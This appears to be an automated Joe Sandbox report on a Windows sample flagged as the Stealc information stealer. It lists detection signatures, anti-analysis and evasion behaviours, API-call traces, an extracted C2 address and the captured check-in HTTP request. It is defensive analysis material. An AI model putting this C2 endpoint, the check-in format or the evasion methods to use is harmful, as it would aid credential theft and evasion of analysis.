Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559586
MD5:73da003f0368f871f2bd1b9b2e0ec575
SHA1:771136fb463501015f73f5cacbec4b5a7c93be18
SHA256:1f4d60eb730020737ff8fbcbff87fb5227003745d875b6b4965bd5cac4925576
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 73DA003F0368F871F2BD1B9B2E0EC575)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6620JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6620JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T17:41:19.739322+010020442431Malware Command and Control Activity Detected192.168.2.649723185.215.113.20680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.206/c4becf79229cb002.php/=Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phplPAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phptopAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpjGAvira URL Cloud: Label: malware
              Source: file.exe.6620.1.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Source: file.exeReversingLabs: Detection: 42%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00394C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00394C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_003B40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003960D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_003960D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_003A6960
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_0039EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00399B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00399B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_003A6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00399B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00399B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00397750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00397750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003A18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A3910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A1269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A1250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003A4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003A23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0039DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_003A2390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0039DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003ACBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003AD530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_003ADD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003916B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003916A0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49723 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDAAFIIJDAAAAKFHIDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 39 38 44 36 30 32 30 32 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 2d 2d 0d 0a Data Ascii: ------ECGDAAFIIJDAAAAKFHIDContent-Disposition: form-data; name="hwid"4498D60202C53528003197------ECGDAAFIIJDAAAAKFHIDContent-Disposition: form-data; name="build"mars------ECGDAAFIIJDAAAAKFHID--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00394C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00394C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDAAFIIJDAAAAKFHIDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 39 38 44 36 30 32 30 32 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 2d 2d 0d 0a Data Ascii: ------ECGDAAFIIJDAAAAKFHIDContent-Disposition: form-data; name="hwid"4498D60202C53528003197------ECGDAAFIIJDAAAAKFHIDContent-Disposition: form-data; name="build"mars------ECGDAAFIIJDAAAAKFHID--
              Source: file.exe, 00000001.00000002.2253123340.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/X
              Source: file.exe, 00000001.00000002.2253123340.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/=
              Source: file.exe, 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpjG
              Source: file.exe, 00000001.00000002.2253123340.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phplP
              Source: file.exe, 00000001.00000002.2253123340.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phptop
              Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/u
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00399770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,1_2_00399770

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007458401_2_00745840
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0063403C1_2_0063403C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B48B01_2_003B48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007441DA1_2_007441DA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00736A1A1_2_00736A1A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0060232A1_2_0060232A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00741BCA1_2_00741BCA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00713C621_2_00713C62
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005F043E1_2_005F043E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00722CD11_2_00722CD1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0062DCB91_2_0062DCB9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00730D601_2_00730D60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00649D291_2_00649D29
